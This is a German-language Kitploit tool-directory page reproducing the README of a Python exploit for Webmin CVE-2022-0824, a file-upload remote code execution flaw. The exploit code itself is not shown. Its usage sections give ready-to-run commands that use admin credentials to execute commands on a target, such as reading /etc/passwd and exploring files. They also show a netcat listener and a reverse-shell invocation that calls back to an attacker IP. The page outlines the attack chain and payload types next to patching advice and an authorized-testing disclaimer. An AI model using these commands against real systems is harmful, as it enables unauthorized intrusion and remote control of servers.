Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Python-Exploit für Webmin CVE-2022-0824 mit Unterstützung für zwei Modi: direkte Befehlsausführung und Reverse Shell. Bietet mehrere Payload-Typen, intelligentes Dateimanagement und detailliertes Debug-Logging für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-ToolShellcode-Generierung
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Python-Exploit für Webmin CVE-2022-0824 mit Unterstützung für zwei Modi: direkte Befehlsausführung und Reverse Shell. Bietet mehrere Payload-Typen, intelligentes Dateimanagement und detailliertes Debug-Logging für autorisierte Sicherheitstests.

Repository anzeigen
7vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Webmin CVE-2022-0824 verbessertes Exploit-Tool – Unterstützt zwei Modi: Befehlsausführung und Reverse Shell

Python Version License CVE

[!IMPORTANT]

Ein verbessertes Exploit-Tool für die Schwachstelle Webmin CVE-2022-0824, das direkte Befehlsausführung und Reverse Shell unterstützt.

🚀 Funktionen

  • ✅ Zwei-Modus-Unterstützung: Befehlsausführungsmodus + Reverse-Shell-Modus
  • ✅ Verschiedene Payloads: Perl, Bash, Python – drei verschiedene Payloads
  • ✅ Intelligentes Dateimanagement: Automatische Generierung eindeutiger Dateinamen zur Vermeidung von Dateikonflikten
  • ✅ Erzwungenes Überschreiben beim Hochladen: Automatische Behandlung von Überschreibungen vorhandener Dateien
  • ✅ Mehrere Upload-Methoden: HTTP-Download, direkter Upload, Erstellung durch Befehlsausführung
  • ✅ Detaillierte Debug-Informationen: Vollständiges Ausführungsprotokoll
  • ✅ Benutzerfreundliche Oberfläche: Farbige Ausgabe und klare Statusmeldungen

📋 Schwachstelleninformationen

  • CVE-Nummer: CVE-2022-0824
  • Betroffene Versionen: Webmin < 1.990
  • Schwachstellentyp: Remote Code Execution durch beliebigen Dateiupload
  • CVSS-Bewertung: 9.8 (Critical)

🛠️ Installationsanforderungen

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 Verwendung

Befehlsausführungsmodus (empfohlen)

root@kitploit:~
# Grundlegende Befehlsausführung
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# Systeminformationen anzeigen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# Dateien auflisten
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# Sensible Dateien anzeigen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# Netzwerkinformationen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

Reverse-Shell-Modus

root@kitploit:~
# 1. Listener starten
nc -nlvp 9999

# 2. Exploit ausführen
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 Parameterbeschreibung

ParameterBeschreibungErforderlichBeispiel
-t, --targetZiel-Webmin-URL✅http://192.168.1.100:10000/
-c, --credentialAnmeldeinformationen✅admin:password
-LS, --py3http_serverHTTP-Server-Adresse✅192.168.1.50:8080
--shellAuszuführender Befehl❌"ls -la"
-L, --callback_ipRückruf-IP für Reverse Shell❌*192.168.1.50
-P, --callback_portRückruf-Port für Reverse Shell❌*9999

*Hinweis: Im Reverse-Shell-Modus erforderlich

🎯 Anwendungsbeispiele

Beispiel 1: Systeminformationen sammeln

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

Beispiel 2: Dateisystem erkunden

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

Beispiel 3: Netzwerkkonfiguration anzeigen

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 Funktionsweise

  1. Anmeldeüberprüfung: Anmeldung an der Webmin-Verwaltungsoberfläche mit den bereitgestellten Anmeldedaten
  2. Payload-Generierung: Erstellung entsprechender CGI-Skripte je nach Modus
  3. Datei-Upload: Hochladen des Payloads über die HTTP-Download-Funktion des Dateimanagers
  4. Berechtigungseinstellung: Festlegen der Ausführungsberechtigungen für die hochgeladene Datei
  5. Befehlsausführung: Aufruf des hochgeladenen CGI-Skripts zur Ausführung von Befehlen oder Aufbau einer Reverse-Verbindung

🛡️ Schutzempfehlungen

  • Aktualisieren Sie Webmin umgehend auf die neueste Version (>= 1.990)
  • Beschränken Sie den Netzwerkzugriff auf die Webmin-Verwaltungsoberfläche
  • Verwenden Sie starke Passwörter und Zwei-Faktor-Authentifizierung
  • Führen Sie regelmäßige Audits der Systemprotokolle durch
  • Setzen Sie eine Web Application Firewall (WAF) ein

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.

  • 🚫 Nicht für nicht autorisierte Systeme verwenden
  • 🚫 Nicht für böswillige Angriffe verwenden
  • 🚫 Der Benutzer trägt die entsprechende rechtliche Verantwortung
  • ✅ Nur in Umgebungen mit ausdrücklicher Genehmigung verwenden
  • ✅ Für Sicherheitsforschung und Schwachstellenvalidierung

📚 Technische Details

Payload-Typen

  • Perl CGI: Primärer Payload, beste Kompatibilität
  • Bash CGI: Alternativer Payload, geeignet für Linux-Systeme
  • Python CGI: Alternativer Payload, umfangreichste Funktionen

Upload-Methoden

  1. HTTP-Download: Über die Remote-Download-Funktion des Webmin-Dateimanagers
  2. Direkter Upload: Über die Datei-Upload-Schnittstelle
  3. Befehlsbereitstellung: Erstellung von Dateien über Systembefehle

Dateibenennungsstrategie

  • MD5-Hash basierend auf Befehlsinhalt
  • Zeitstempel-Suffix
  • Stellt sicher, dass bei jeder Ausführung ein anderer Dateiname verwendet wird

🔄 Änderungsprotokoll

v5.0 (2025-08-05)

  • ✨ Neuer Befehlsausführungsmodus
  • 🐛 Problem mit Dateiüberschreibung behoben
  • 🔧 Dateibenennungsstrategie verbessert
  • 📈 Fehlerbehandlung verbessert

v4.0 (Basierend auf Original)

  • 🎯 Basierend auf dem ursprünglichen Code von faisalfs10x
  • 🔧 CGI-Kompatibilität verbessert
  • 📝 Detaillierte Protokollierung hinzugefügt

🤝 Beitragen

Willkommen bei der Einreichung von Issues und Pull Requests!

  1. Forken Sie dieses Repository
  2. Erstellen Sie einen Feature-Branch (git checkout -b feature/AmazingFeature)
  3. Committen Sie die Änderungen (git commit -m 'Add some AmazingFeature')
  4. Pushen Sie den Branch (git push origin feature/AmazingFeature)
  5. Öffnen Sie einen Pull Request

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – weitere Details finden Sie in der LICENSE-Datei.

🙏 Danksagungen

  • Autor des Originalcodes: @faisalfs10x
  • Ursprüngliches Projekt: Webmin-CVE-2022-0824-revshell
  • Entdecker des CVE: Zugehörige Sicherheitsforscher

📞 Kontakt

Bei Fragen oder Anregungen kontaktieren Sie uns bitte über:

  • 📧 Einreichen eines GitHub Issue
  • 🐛 Melden Sie Sicherheitsprobleme per privater Nachricht

⭐ Wenn dieses Projekt Ihnen hilft, geben Sie bitte einen Star zur Unterstützung!

🔗 Verwandte Links

  • CVE-2022-0824 Details
  • Webmin Offizielle Website
  • Ursprüngliches Projekt

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
Tool herunterladen